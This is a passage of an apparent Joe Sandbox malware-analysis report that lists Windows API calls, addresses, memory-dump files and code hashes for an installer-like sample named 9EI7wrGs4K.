                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                    • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                    • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                    • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                    • String ID: nsa
                                                                                                                                                                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                    • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                    • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: HideWindow
                                                                                                                                                                                                                                                                                    • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                    • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                    • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                    • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                    • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                    • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                    • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                    • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                    • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                    • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
